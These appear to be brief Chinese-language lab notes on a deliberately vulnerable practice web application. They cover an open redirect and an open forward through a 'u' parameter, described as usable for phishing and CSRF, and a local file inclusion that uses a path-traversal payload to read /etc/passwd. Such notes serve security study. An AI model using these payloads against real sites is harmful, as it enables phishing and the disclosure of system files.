Open Redirect
- 源文件:/vulnerability/url/open.php
http://192.168.1.228/vulnerability/url/open.php?u=http://www.breakthesecurity.com
修改u参数就可以任意跳转,可用于钓鱼等
Open Forward
- 源文件:/vulnerability/url/forward.php
修改u参数就可以任意跳转,结合<a>
标签可CSRF等
File Inclusion
Local File Inclusion
- 源文件:/vulnerability/lfi/LFI.php
读取/etc/passwd
?file=../../../../../../etc/passwd